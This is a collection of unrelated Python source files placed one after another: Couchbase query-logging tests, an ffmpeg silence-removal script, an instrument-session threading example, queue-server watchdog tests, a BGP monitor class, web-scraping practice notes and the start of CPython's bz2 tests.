% self.servers[0].ip)
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
result = self.run_cbq_query(
'select * from system:active_requests where node = "%s:%s"'
% (self.servers[1].ip, self.servers[1].port))
if not result['metrics']['resultCount'] == 2:
self.threadFailure = True
logging.error(
'THE QUERIES FOR node "%s" SHOULD NOT HAVE BEEN KILLED'
% self.servers[1].ip)
self.log.error(json.dumps(result, sort_keys=True, indent=3))
return
##############################################################################################
#
# Configuration Test Settings (Completed_requests configuration settings)
#
##############################################################################################
'''Check that the configuration settings for system:completed_requests can be changed'''
def test_set_completed_config(self):
# Change the collection setting
response, content = self.rest.set_completed_requests_collection_duration(self.master, 10000)
result = json.loads(content)
self.assertEqual(result['completed-threshold'], 10000)
response, content = self.rest.set_completed_requests_collection_duration(self.master, 1000)
result = json.loads(content)
self.assertEqual(result['completed-threshold'], 1000)
# Change the retention setting
response, content = self.rest.set_completed_requests_max_entries(self.master, 10)
result = json.loads(content)
self.assertEqual(result['completed-limit'], 10)
response, content = self.rest.set_completed_requests_max_entries(self.master, 4000)
result = json.loads(content)
self.assertEqual(result['completed-limit'], 4000)
'''Check that you can change the maximum number of entries that system:completed requests keeps at one time.'''
def test_retention_config(self):
self.rest.set_completed_requests_max_entries(self.master, 4000)
num_entries = 10
# Change the retention setting to only hold the amount of queries specified by num_entries
response, content = self.rest.set_completed_requests_max_entries(self.master, num_entries)
result = json.loads(content)
self.assertEqual(result['completed-limit'], num_entries)
# Run more than num_entries(10) queries
for i in range(num_entries * 2):
self.run_cbq_query('select * from ' + self.query_buckets[0] + '')
time.sleep(1)
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 10)
# negative should disable the limit
num_entries = -1
response, content = self.rest.set_completed_requests_max_entries(self.master, num_entries)
result = json.loads(content)
self.assertEqual(result['completed-limit'], num_entries)
for i in range(100):
self.run_cbq_query('select * from ' + self.query_buckets[0])
time.sleep(1)
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 110)
# 0 should disable logging
num_entries = 0
response, content = self.rest.set_completed_requests_max_entries(self.master, num_entries)
result = json.loads(content)
self.assertEqual(result['completed-limit'], num_entries)
self.run_cbq_query('select * from ' + self.query_buckets[0])
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 110)
self.rest.set_completed_requests_max_entries(self.master, 4000)
'''Check that you can change the min duration a query has to run for to be stored in system:completed_requests'''
def test_collection_config(self):
self.rest.set_completed_requests_collection_duration(self.master, 1000)
# Test the default setting of 1 second
self.run_cbq_query('select * from system:active_requests')
self.run_cbq_query('select * from ' + self.query_buckets[0])
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 1)
# Wipe the completed logs for the next test
self.run_cbq_query('delete from system:completed_requests')
# Change the minimum number of milliseconds a query needs to run for to be collected, in this case 8 seconds
min_duration = 5000
# Change the collection setting
response, content = self.rest.set_completed_requests_collection_duration(self.master, min_duration)
result = json.loads(content)
self.assertEqual(result['completed-threshold'], min_duration)
# Construct nonsense queries that run for 5 seconds
self.run_cbq_query('select * from ' + self.query_buckets[0] + ' union select * from ' + self.query_buckets[
0] + ' union select * from ' + self.query_buckets[0])
self.run_cbq_query('select * from ' + self.query_buckets[0] + ' union select * from ' + self.query_buckets[
0] + ' union select * from ' + self.query_buckets[0])
# Run a query that runs for a normal amount of time ~2 seconds
self.run_cbq_query('select * from ' + self.query_buckets[0] + ' limit 1000')
self.run_cbq_query('select * from ' + self.query_buckets[0] + ' limit 1000')
# Only the queries run for longer than 8 seconds should show up
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 2)
# Wipe the completed logs for the next test
self.run_cbq_query('delete from system:completed_requests')
# Check 1 millisecond, basically any query should show up here
min_duration = 1
response, content = self.rest.set_completed_requests_collection_duration(self.master, min_duration)
result = json.loads(content)
self.assertEqual(result['completed-threshold'], min_duration)
self.run_cbq_query('select * from system:active_requests')
self.run_cbq_query('select * from ' + self.query_buckets[0])
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 2)
# Disable logging
min_duration = -1
# Change the collection setting
response, content = self.rest.set_completed_requests_collection_duration(self.master, min_duration)
result = json.loads(content)
self.assertTrue(result['completed-threshold'] == min_duration)
self.run_cbq_query('delete from system:completed_requests')
self.run_cbq_query('select * from ' + self.query_buckets[0])
self.run_cbq_query('select * from ' + self.query_buckets[0])
# No queries should appear
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 0)
self.rest.set_completed_requests_collection_duration(self.master, 1000)
|
rm_silence_vid.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 10 17:51:52 2019
@author: Mohammed Al-Rawi
Removing silence segements from videos.
Noise value can be used to control how much noise needs to be remvoed. Lower
'noise' dB value indicates lower noise (keeping in mind that -90 is lower than -30).
"""
import multiprocessing
import time
import argparse
import subprocess
import os
import re
import tqdm
parser = argparse.ArgumentParser()
parser.add_argument('--video_in', type=str, default='Pacino.mp4', help='Name of input video file')
parser.add_argument('--video_out', type=str, default='Pacino_no_silence.mp4',
help='Name of output video file such that silence removed')
parser.add_argument('--silecne_file_out', type=str, default='tag_silence.txt',
help='Temporary text file that stores the detected silence, this is not needed by the user, and can be removed')
parser.add_argument('--noise', type=int, default=-30, help=
'-10<noise<-90: Low value removes a lot of noise in dB, higher values are some how tollerant')
param = parser.parse_args()
''' This function generates the progress bar in parallel with the other function
that removes the silence, which is called process_movie. The function is simple, it reads the size of
generated (no silence) video file every 3 seconds and updates the progress bar, until the size stops
increaseing which mimics the end of finish, i.e. "silence removal". This function can be imporoved in many ways,
like for example, doing some analysis on the size of input file and finding the correlation between the size
help estimating the size of the output (no silence file) and a better progress bar would be feasible. '''
def progress_bar(param):
size_in = 10*int( os.stat(param.video_in).st_size /1000000) # size of input file
size_out = 1; size_old = 0
time.sleep(3) # waiting for a while until silence tagging is done
pbar = tqdm.tqdm(total = 100) # the progress bar has 100 bins
while True:
if os.path.exists(param.video_out):
size_out = 10*int ( os.stat(param.video_out).st_size/1000000)
if size_out == size_old: # when the size is not changngeing, silence removal is done
return
else:
size_old = size_out
else:
size_out=0
pbar.update(int(.25* (100*size_out)/size_in))
time.sleep(3)
'''This is the core function that useses ffmpeg to detect the silence intervals,
then, remoging it, again, wiht ffmpeg. We are using a subproecess that calls ffmpeg
from the command line. '''
def process_movie(param):
if os.path.exists(param.video_out):
print('Removing old %s file' % param.video_out)
subprocess.call('rm -f '+ param.video_out, shell=True)
print('Detecting silence intervals, and then, removing the detected silence')
cmd_dtct_silence = 'ffmpeg -i '+ param.video_in + ' -af silencedetect=noise='+str(param.noise)+'dB:d=0.5 -f null - 2> ' + param.silecne_file_out
x1 = subprocess.call(cmd_dtct_silence, shell=True)
if x1!=0: print('Silense taggin not successful')
start_time, end_time = get_times(param.silecne_file_out)
cmd_rmv_silence = time_to_cmd(start_time, end_time, param)
x2 = subprocess.call(cmd_rmv_silence, shell=True)
if x2!=0: print('Silence removal not successful')
''''This function converst H:M:S time into seconds '''
def hms_time_to_sec(time_str):
h_m_s = time_str.split(':')
return float(h_m_s[0]) * 3600 + float(h_m_s[1]) * 60 + float(h_m_s[2])
'''This function reads the file generated by ffmpeg silence detection.
The file is genrated after running the command "cmd_dtct_silence"
shown in process_movie() function. This function can be improved in many ways. '''
def get_times(fname):
text_file = open(fname, "r")
text_lines = text_file.readlines()
start_time =[]
end_time = []
movie_duration = 0 # forward assignment to prevent warnings
for line in text_lines:
if re.search(r'\b(Duration)\b', line) !=None:
token = line.split()
movie_duration = token[1] # read movie duration
if re.search(r'\b(silencedetect)\b', line) !=None:
token = line.split()
if token[3] == 'silence_start:':
start_time.append(abs(float(token[4]))) # for some reason, start time is -0.01
# start_time.append(float(token[4])) # for some reason, start time is -0.01
elif token[3] == 'silence_end:':
end_time.append(float(token[4]))
else:
continue
end_time.insert(0, 0) # For pos 0, insert time 0; see Timing Algorithm used in time_to_cmd()
movie_duration = hms_time_to_sec(movie_duration[:-1])
start_time.append(movie_duration)
end_time.append(movie_duration) if len(end_time)<len(start_time) else None # sometimes silence is detected, but ends with the movie, so, we might not have end_time for the last detected silence, we need thus to add/append the end of the movie
return start_time, end_time
'''This function converts the detected silence times, that are obtained via
get_times() function into a command that can be used to remove the silce by ffmpeg '''
def time_to_cmd(start_time, end_time, param):
''' Timing Algorithm used:
t0(inserted to end_time)->tstrt1
tend1->tstrt2
.
.
tend_m -> t_movie_duration(appended to start_time)
'''
strt_end_string =''
for i in range(len(start_time)):
strt_end_string = strt_end_string + \
'between(t,' + str(end_time[i]) + ',' + str(start_time[i])+')' + '+'
strt_end_string = strt_end_string[:-1] # removing last plus
cmd_rmv_silence = 'ffmpeg -loglevel quiet -i '+ param.video_in + ' -vf '
cmd_rmv_silence = cmd_rmv_silence + '"select=' "'" + strt_end_string + "'"
cmd_rmv_silence = cmd_rmv_silence + ', setpts=N/FRAME_RATE/TB"'
cmd_rmv_silence = cmd_rmv_silence + ' -af '
cmd_rmv_silence = cmd_rmv_silence + '"aselect=' "'" + strt_end_string + "'"
cmd_rmv_silence = cmd_rmv_silence + ',asetpts=N/SR/TB" ' + param.video_out
return cmd_rmv_silence
# if __name__ == '__main__':
if not os.path.exists(param.video_in):
print('Cannot open file', param.video_in)
exit(0)
else:
'''Here, we have two parallel processes, p1 that processes the movie
and p2 that generates a progress bar. This is because I am using ffmpeg
from the terminal/shell to detect the silence, and then, to remove it.'''
p1 = multiprocessing.Process(target=process_movie, args = (param,))
p1.start()
p2 = multiprocessing.Process(target=progress_bar, args=(param,))
p2.start()
|
Example_MultithreadMultipleSessions.py
|
.. code-block:: python
"""
Multiple threads are accessing two RsInstrument objects with two separate sessions
"""
import threading
from RsInstrument import *
def execute(session: RsInstrument, session_ix, index) -> None:
"""Executed in a separate thread."""
print(f'{index} session {session_ix} query start...')
session.query_str('*IDN?')
print(f'{index} session {session_ix} query end')
# Make sure you have the RsInstrument version 1.9.0 and newer
RsInstrument.assert_minimum_version('1.9.0')
instr1 = RsInstrument('TCPIP::192.168.56.101::INSTR')
instr2 = RsInstrument('TCPIP::192.168.56.101::INSTR')
instr1.visa_timeout = 200
instr2.visa_timeout = 200
# Synchronise the sessions by sharing the same lock
instr2.assign_lock(instr1.get_lock()) # To see the effect of crosstalk, comment this line
threads = []
for i in range(10):
t = threading.Thread(target=execute, args=(instr1, 1, i,))
t.start()
threads.append(t)
t = threading.Thread(target=execute, args=(instr2, 2, i,))
t.start()
threads.append(t)
print('All threads started')
# Wait for all threads to join this main thread
for t in threads:
t.join()
print('All threads ended')
instr2.close()
instr1.close()
|
test_start_manager.py
|
import threading
import time as ttime
import json
from bluesky_queueserver.manager.start_manager import WatchdogProcess
from bluesky_queueserver.tests.common import format_jsonrpc_msg
class ReManagerEmulation(threading.Thread):
"""
Emulation of RE Manager, which is using Thread instead of Process.
The functionality of the emulator is to test if Watchdog can start
and restart RE Manager properly. The emulator also generates periodic
'heartbeat' messages to inform RE Manager that it is running.
"""
def __init__(self, *args, conn_watchdog, conn_worker, config=None, log_level="DEBUG", **kwargs):
super().__init__(*args, **kwargs)
self._conn_watchdog = conn_watchdog
self.n_loops = 0
self._exit = False
self._restart = False
self._send_heartbeat = True
self._lock = threading.Lock()
self._config = config or {}
self._log_level = log_level
def _heartbeat(self):
hb_period, dt = 0.5, 0.01
n_wait = round(hb_period / dt)
msg = format_jsonrpc_msg("heartbeat", {"value": "alive"}, notification=True)
msg_json = json.dumps(msg)
while True:
# Since we are emulating 'kill' method, we want the function to
# react to 'exit' quickly.
for n in range(n_wait):
ttime.sleep(0.005)
if self._exit:
return
if self._send_heartbeat:
with self._lock:
self._conn_watchdog.send(msg_json)
def exit(self, *, restart=False):
"""
Stop the emulated RE Manager (exit the 'run' method). Set 'restart=True'
to skip informing Watchdog that the exit is intentional: Watchdog is expected
to restart the process.
"""
self._restart = restart
self._exit = True
def kill(self):
"""
This is emulation of 'kill' method of mp.Process. The method just normally
exists the current process.
"""
self.exit(restart=True)
def send_msg_to_watchdog(self, method, params=None, *, notification=False, timeout=0.5):
# The function may block all communication for the period of 'timeout', but
# this is acceptable for testing. Timeout would typically indicate an error.
msg = format_jsonrpc_msg(method, params, notification=notification)
with self._lock:
self._conn_watchdog.send(json.dumps(msg))
if notification:
return
if self._conn_watchdog.poll(timeout):
response_json = self._conn_watchdog.recv()
response = json.loads(response_json)
result = response["result"]
else:
result = None
return result
def stop_heartbeat(self):
"""
Heatbeat generator may be stopped to emulate 'freezing' of the event loop of RE Manager.
"""
self._send_heartbeat = False
def run(self):
th_hb = threading.Thread(target=self._heartbeat)
th_hb.start()
while not self._exit:
ttime.sleep(0.01)
self.n_loops += 1
if not self._restart:
msg = format_jsonrpc_msg("manager_stopping", notification=True)
with self._lock:
self._conn_watchdog.send(json.dumps(msg))
th_hb.join()
class ReWorkerEmulation(threading.Thread):
def __init__(self, *args, conn, config=None, log_level="DEBUG", **kwargs):
super().__init__(*args, **kwargs)
self._config = config or {}
self._exit = False
self.n_loops = 0
self._log_level = log_level
def exit(self):
self._exit = True
def kill(self):
self.exit()
def run(self):
while not self._exit:
ttime.sleep(0.005)
self.n_loops += 1
def test_WatchdogProcess_1():
"""Test starting and orderly existing the RE Manager"""
wp = WatchdogProcess(cls_run_engine_manager=ReManagerEmulation)
wp_th = threading.Thread(target=wp.run)
wp_th.start()
ttime.sleep(1) # Let RE Manager run 1 second
assert wp._re_manager.n_loops > 0, "RE is not running"
wp._re_manager.exit(restart=False)
ttime.sleep(0.05)
assert wp._manager_is_stopping is True, "'Manager Stopping' flag is not set"
wp_th.join(0.1)
def test_WatchdogProcess_2():
"""Test starting RE Manager, stopping heartbeat generator
and waiting for restart of RE Manager"""
wp = WatchdogProcess(cls_run_engine_manager=ReManagerEmulation)
wp_th = threading.Thread(target=wp.run)
wp_th.start()
ttime.sleep(1) # Let RE Manager run 1 second
assert wp._re_manager.n_loops > 0, "RE is not running"
n_loops = wp._re_manager.n_loops
wp._re_manager.stop_heartbeat()
hb_timeout = wp._heartbeat_timeout
ttime.sleep(hb_timeout + 0.5)
# At this point RE Manager is expected to run for 0.5 second, so
# the new number of loops must be about 'n_loops/2'.
# Here we check if RE Manager was really restarted and the number of
# loops reset.
assert wp._re_manager.n_loops < n_loops, "Unexpected number of loops"
wp._re_manager.exit(restart=False)
ttime.sleep(0.05)
assert wp._manager_is_stopping is True, "'Manager Stopping' flag is not set"
wp_th.join(0.1)
def test_WatchdogProcess_3():
"""Test starting RE Manager, exiting without sending notification and
and waiting for the restart of RE Manager"""
wp = WatchdogProcess(cls_run_engine_manager=ReManagerEmulation)
wp_th = threading.Thread(target=wp.run)
wp_th.start()
ttime.sleep(1) # Let RE Manager run 1 second
assert wp._re_manager.n_loops > 0, "RE is not running"
n_loops = wp._re_manager.n_loops
# Stop RE Manager without notifying the Watchdog (emulates crashing of RE Manager)
wp._re_manager.exit(restart=True)
hb_timeout = wp._heartbeat_timeout
ttime.sleep(hb_timeout + 0.5)
# At this point RE Manager is expected to run for 0.5 second, so
# the new number of loops must be about 'n_loops/2'.
# Here we check if RE Manager was really restarted and the number of
# loops reset.
assert wp._re_manager.n_loops < n_loops, "Unexpected number of loops"
wp._re_manager.exit(restart=False)
ttime.sleep(0.05)
assert wp._manager_is_stopping is True, "'Manager Stopping' flag is not set"
wp_th.join(0.1)
def test_WatchdogProcess_4():
"""
Test if Watchdog correctly executing commands that control starting
and stopping RE Worker.
"""
wp = WatchdogProcess(cls_run_engine_manager=ReManagerEmulation, cls_run_engine_worker=ReWorkerEmulation)
wp_th = threading.Thread(target=wp.run)
wp_th.start()
ttime.sleep(0.01)
response = wp._re_manager.send_msg_to_watchdog("start_re_worker")
assert response["success"] is True, "Unexpected response from RE Manager"
# Worker is expected to be alive
response = wp._re_manager.send_msg_to_watchdog("is_worker_alive")
assert response["worker_alive"] is True, "Unexpected response from RE Manager"
# Join running process (thread). Expected to timeout.
# Note: here timeout should be set to be smaller than timeout for the message
# in 'send_msg_to_watchdog method.
response = wp._re_manager.send_msg_to_watchdog("join_re_worker", {"timeout": 0.1})
assert response["success"] is False, "Unexpected response from RE Manager"
# Worker is expected to be alive
response = wp._re_manager.send_msg_to_watchdog("is_worker_alive")
assert response["worker_alive"] is True, "Unexpected response from RE Manager"
# Exit the process (thread).
wp._re_worker.exit()
ttime.sleep(0.01)
# Worker is expected to be stopped
response = wp._re_manager.send_msg_to_watchdog("is_worker_alive")
assert response["worker_alive"] is False, "Unexpected response from RE Manager"
response = wp._re_manager.send_msg_to_watchdog("join_re_worker", {"timeout": 0.5})
assert response["success"] is True, "Unexpected response from RE Manager"
wp._re_manager.exit(restart=False)
wp_th.join(0.1)
def test_WatchdogProcess_5():
"""
Test 'kill_re_worker' command RE Worker.
"""
wp = WatchdogProcess(cls_run_engine_manager=ReManagerEmulation, cls_run_engine_worker=ReWorkerEmulation)
wp_th = threading.Thread(target=wp.run)
wp_th.start()
ttime.sleep(0.01)
response = wp._re_manager.send_msg_to_watchdog("start_re_worker")
assert response["success"] is True, "Unexpected response from RE Manager"
# Worker is expected to be alive
response = wp._re_manager.send_msg_to_watchdog("is_worker_alive")
assert response["worker_alive"] is True, "Unexpected response from RE Manager"
# Kill RE Worker process (emulated, since RE Worker is a thread)
response = wp._re_manager.send_msg_to_watchdog("kill_re_worker")
assert response["success"] is True, "Unexpected response from RE Manager"
# Worker is expected to be stopped
response = wp._re_manager.send_msg_to_watchdog("is_worker_alive")
assert response["worker_alive"] is False, "Unexpected response from RE Manager"
response = wp._re_manager.send_msg_to_watchdog("join_re_worker", {"timeout": 0.5})
assert response["success"] is True, "Unexpected response from RE Manager"
wp._re_manager.exit(restart=False)
wp_th.join(0.1)
def test_WatchdogProcess_6():
"""
Test if RE configuration is passed to RE Worker
"""
config_worker = {"some_parameter1": "some_value1"}
config_manager = {"some_parameter2": "some_value2"}
wp = WatchdogProcess(
config_worker=config_worker,
config_manager=config_manager,
cls_run_engine_manager=ReManagerEmulation,
cls_run_engine_worker=ReWorkerEmulation,
)
wp_th = threading.Thread(target=wp.run)
wp_th.start()
ttime.sleep(0.01)
response = wp._re_manager.send_msg_to_watchdog("start_re_worker")
assert response["success"] is True, "Unexpected response from RE Manager"
# Check if configuration was set correctly in RE Worker and RE manager
assert wp._re_worker._config == config_worker, "Worker configuration was not passed correctly"
assert wp._re_manager._config == config_manager, "Manager configuration was not passed correctly"
# Exit the process (thread).
wp._re_worker.exit()
ttime.sleep(0.01)
response = wp._re_manager.send_msg_to_watchdog("join_re_worker", {"timeout": 0.5})
assert response["success"] is True, "Unexpected response from RE Manager"
wp._re_manager.exit(restart=False)
wp_th.join(0.1)
|
monitor.py
|
# Copyright (C) 2016 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from gobgp import GoBGP
import os
from settings import dckr
import yaml
import json
from threading import Thread
import time
import datetime
def rm_line():
print('\x1b[1A\x1b[2K\x1b[1D\x1b[1A')
class Monitor(GoBGP):
CONTAINER_NAME = 'bgperf_monitor'
def run(self, conf, dckr_net_name=''):
ctn = super(GoBGP, self).run(dckr_net_name)
config = {}
config['global'] = {
'config': {
'as': conf['monitor']['as'],
'router-id': conf['monitor']['router-id'],
},
}
config ['neighbors'] = [{'config': {'neighbor-address': conf['target']['local-address'],
'peer-as': conf['target']['as']},
'transport': {'config': {'local-address': conf['monitor']['local-address']}},
'timers': {'config': {'connect-retry': 10}}}]
with open('{0}/{1}'.format(self.host_dir, 'gobgpd.conf'), 'w') as f:
f.write(yaml.dump(config))
self.config_name = 'gobgpd.conf'
startup = '''#!/bin/bash
ulimit -n 65536
gobgpd -t yaml -f {1}/{2} -l {3} > {1}/gobgpd.log 2>&1
'''.format(conf['monitor']['local-address'], self.guest_dir, self.config_name, 'info')
filename = '{0}/start.sh'.format(self.host_dir)
with open(filename, 'w') as f:
f.write(startup)
os.chmod(filename, 0o777)
i = dckr.exec_create(container=self.name, cmd='{0}/start.sh'.format(self.guest_dir))
dckr.exec_start(i['Id'], detach=True, socket=True)
self.config = conf
return ctn
def local(self, cmd, stream=False):
i = dckr.exec_create(container=self.name, cmd=cmd)
return dckr.exec_start(i['Id'], stream=stream)
def wait_established(self, neighbor):
n = 0
while True:
if n > 0:
rm_line()
print(f"Waiting {n} seconds for monitor")
try:
neigh = json.loads(self.local('gobgp neighbor {0} -j'.format(neighbor)).decode('utf-8'))
except Exception as e:
print(f"Monitor reading exception: {e}")
continue
if ((neigh['state']['session_state'] == 'established') or
(neigh['state']['session_state'] == 6)):
return n
time.sleep(1)
n = n+1
def stats(self, queue):
self.stop_monitoring = False
def stats():
cps = self.config['monitor']['check-points'] if 'check-points' in self.config['monitor'] else []
while True:
if self.stop_monitoring:
return
try:
info = json.loads(self.local('gobgp neighbor -j').decode('utf-8'))[0]
except Exception as e:
print(f"Monitor reading exception: {e}")
continue
info['who'] = self.name
state = info['afi_safis'][0]['state']
if 'accepted'in state and len(cps) > 0 and int(cps[0]) <= int(state['accepted']):
cps.pop(0)
info['checked'] = True
else:
info['checked'] = False
info['time'] = datetime.datetime.now()
queue.put(info)
time.sleep(1)
t = Thread(target=stats)
t.daemon = True
t.start()
|
Day-Test.py
|
# 每日练习,即用即更
import json
import re
import threading
import time
from queue import Queue
import requests
from bs4 import BeautifulSoup
from lxml import etree
from retrying import retry
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/64.0.3282.204 Safari/537.36"
}
# 1.转换cookie为字典,将字典转换为cookie
def trans_test():
response = requests.get('http://www.xingtu.info/')
cookies = requests.utils.dict_from_cookiejar(response.cookies) # cookie -> dict
print('cookie_dict:', cookies)
cookies = requests.utils.cookiejar_from_dict(cookies) # dict -> cookie
print('cookie_object', cookies)
# trans_test()
# 2.使用代理(proxies指定代理,可放多个)
def proxie_test():
proxies = {
"http": '218.14.115.211:3128'
}
requests.get('http://www.xingtu.info/', headers=headers, proxies=proxies)
# proxie_test()
# 3.处理证书错误(使用verify参数跳过证书验证)
def ssl_test():
response = requests.get('https://www.12306.cn/mormhweb/', headers=headers, verify=False)
with open('./1.html', 'wb') as file:
file.write(response.content)
# ssl_test()
# 4.超时处理(超时会报错),并重试(retrying)
@retry(stop_max_attempt_number=3)
def retry_test():
proxies = {
"https": '120.33.247.207:8010'
}
response = requests.get('https://www.baidu.com', headers=headers, proxies=proxies, timeout=3)
print(response.content)
# retry_test()
# 5.dump,dump2,load,loads
def json_test():
data = json.dumps([{"a": "1"}, '3']) # dumps-python格式转json格式
print(json.loads(data)) # loads-json格式转python格式
file = open('./test.dat', 'w') # dump-向文件写入json
json.dump(data, file)
file.close()
file = open('./test.dat', 'r') # load-从文件读取json
content = json.load(file)
file.close()
print(content)
# json_test()
# 6.zip(),将可迭代.的对象作为参数,将每个对象中相同下标的元素打包成一个元组,然后返回由这些元组组成的列表。
def zip_test():
a = [1, 2, 3]
b = [4, 5, 6]
c = [4, 5, 6, 7, 8]
zipped = zip(a, b) # 打包
print(zipped)
print(zip(a, c)) # 列表中元素的个数与最短的列表一致
print(zip(*zipped)) # *zipped 可理解为解压,返回二维矩阵式
# zip_test()
# 7.re(使用compile,re.S(使'.'包括换行符),re.I(忽略大小写))
def re_test():
string = '123qwe\n123QWE'
reg = re.compile(r'.*', re.S) # re.S - 使'.'包括换行符
print(reg.search(string))
reg = re.compile(r'.*qwe.*qwe', re.S | re.I) # re.I - 忽略大小写
print(reg.search(string))
# re_test()
# 8.xpath
def xpath_test():
with open('./test.html', 'r') as file:
e = etree.HTML(file.read())
print(e.xpath('//p'))
# xpath_test()
# 9.bs4(规则可百度css选择器)
def bs4_test():
with open('./test.html', 'r') as file:
html = file.read()
soup = BeautifulSoup(html, 'lxml')
# 标签选择器
print(soup.a.string) # 获取注释或内容,type:bs4对象
print(soup.a.get_text()) # 获取内容,type:str
print(soup.find('a'))
print(soup.find('a', attrs={'id': 'link2'}))
print(soup.find_all('a', attrs={'id': 'link2', 'class': 'sister'}))
print(soup.find_all('a'))
print(soup.find_all('a', attrs={'class': 'sister'}))
# 类选择器
print(soup.select('.sister'))
print(soup.select('.sister.haha')) # 多个类名
print(soup.select('.sister .haha')) # 子孙
print(soup.select('.sister > .haha')) # 儿子
print(soup.select('.sister , .haha')) # 或
# id选择器
print(soup.select('#link2'))
# 属性选择器
print(soup.select('a[id="link2"]'))
# 层级选择器
print(soup.select('p a')) # 子孙
print(soup.select('p > a')) # 儿子
print(soup.select('p , a')) # 或
# bs4_test()
# 10.守护线程和守护进程(True:随着主进程结束,False:主进程结束子线程(进程)继续运行)
def daemon_test():
def run():
while True:
print('1')
time.sleep(1)
th = threading.Thread(target=run)
th.setDaemon(True)
th.start()
# daemon_test()
# 11.队列使用
def queue_test():
queue = Queue(maxsize=10)
print('-----------程序开始------------')
print('qsize:', queue.qsize())
print('unfinished_tasks:', queue.unfinished_tasks) # unfinished_tasks是Queue内部变量 - 队列中尚未结束的任务数
print('-----------put------------')
queue.put('1')
print('qsize:', queue.qsize())
print('unfinished_tasks:', queue.unfinished_tasks)
print('-----------get------------')
queue.get()
print('qsize:', queue.qsize())
print('unfinished_tasks:', queue.unfinished_tasks)
print('-----------task_done------------')
queue.task_done() # unfinished_tasks - 1
print('qsize:', queue.qsize())
print('unfinished_tasks:', queue.unfinished_tasks)
print('-----------join------------')
queue.join() # 监控unfinished_tasks,如果不为0就阻塞
# queue_test()
# 斗鱼首页直播间数据(selenium)
# 微博登陆(selenium有验证码)
# scrapy
# pip install scrapy
# 创建一个scrapy项目: -> cd 到项目目录 -> scrapy startproject scrapy项目名 -> 如:scrapy startproject myspider
# 生成一个爬虫: -> cd到scrapy项目目录 -> scrapy genspider 爬虫名 "一级域名" -> 如:scrapy genspider tencent 'tencent.com'
# 注意:
# response.xpath方法的返回结果是一个类似list的类型,其中包含的是selector对象,操作和列表一样,但是有一些额外的方法
# extract() 返回一个包含有字符串的列表
# extract_first() 返回列表中的第一个字符串,列表为空没有返回None
# spider中的parse方法必须有
# 需要抓取的url地址必须属于allowed_domains,但是start_urls中的url地址没有这个限制
# 启动爬虫的时候注意启动的位置,是在项目路径下启动
# 为什么要使用yield?
# 让整个函数变成一个生成器,有什么好处呢?
# 遍历这个函数的返回值的时候,挨个把数据读到内存,不会造成内存的瞬间占用过高
# python3中的range和python2中的xrange同理
# 注意:
# yield能够传递的对象只能是:BaseItem,Request,dict,None
# pipeline在settings中能够开启多个,为什么需要开启多个?
# 不同的pipeline可以处理不同爬虫的数据
# 不同的pipeline能够进行不同的数据处理的操作,比如一个进行数据清洗,一个进行数据的保存
# pipeline使用注意点
# 使用之前需要在settings中开启
# pipeline在setting中键表示位置(即pipeline在项目中的位置可以自定义),值表示距离引擎的远近,越近数据会越先经过
# 有多个pipeline的时候,process_item的方法必须return item,否则后一个pipeline取到的数据为None值
# pipeline中process_item的方法必须有,否则item没有办法接受和处理
# process_item方法接受item和spider,其中spider表示当前传递item过来的spider
# 为了让我们自己希望输出到终端的内容能容易看一些,我们可以在setting中设置log级别
# 在setting中添加一行(全部大写):LOG_LEVEL = "WARNING”
# 默认终端显示的是debug级别的log信息
# 腾讯招聘(scrapy)
|
test_bz2.py
|
from test import support
from test.support import bigmemtest, _4G
import unittest
from io import BytesIO, DEFAULT_BUFFER_SIZE
import os
import pickle
import glob
import tempfile
import pathlib
import random
import shutil
import subprocess
import threading
from test.support import import_helper
from test.support import threading_helper
from test.support.os_helper import unlink
import _compression
import sys
# Skip tests if the bz2 module doesn't exist.
bz2 = import_helper.import_module('bz2')
from bz2 import BZ2File, BZ2Compressor, BZ2Decompressor
has_cmdline_bunzip2 = None
def ext_decompress(data):
global has_cmdline_bunzip2
if has_cmdline_bunzip2 is None:
has_cmdline_bunzip2 = bool(shutil.which('bunzip2'))
if has_cmdline_bunzip2:
return subprocess.check_output(['bunzip2'], input=data)
else:
return bz2.decompress(data)
class BaseTest(unittest.TestCase):
"Base for other testcases."
TEXT_LINES = [
b'root:x:0:0:root:/root:/bin/bash\n',
b'bin:x:1:1:bin:/bin:\n',
b'daemon:x:2:2:daemon:/sbin:\n',
b'adm:x:3:4:adm:/var/adm:\n',
b'lp:x:4:7:lp:/var/spool/lpd:\n',
b'sync:x:5:0:sync:/sbin:/bin/sync\n',
b'shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\n',
b'halt:x:7:0:halt:/sbin:/sbin/halt\n',
b'mail:x:8:12:mail:/var/spool/mail:\n',
b'news:x:9:13:news:/var/spool/news:\n',
b'uucp:x:10:14:uucp:/var/spool/uucp:\n',
b'operator:x:11:0:operator:/root:\n',
b'games:x:12:100:games:/usr/games:\n',
b'gopher:x:13:30:gopher:/usr/lib/gopher-data:\n',
b'ftp:x:14:50:FTP User:/var/ftp:/bin/bash\n',
b'nobody:x:65534:65534:Nobody:/home:\n',
b'postfix:x:100:101:postfix:/var/spool/postfix:\n',
b'niemeyer:x:500:500::/home/niemeyer:/bin/bash\n',
b'postgres:x:101:102:PostgreSQL Server:/var/lib/pgsql:/bin/bash\n',
b'mysql:x:102:103:MySQL server:/var/lib/mysql:/bin/bash\n',
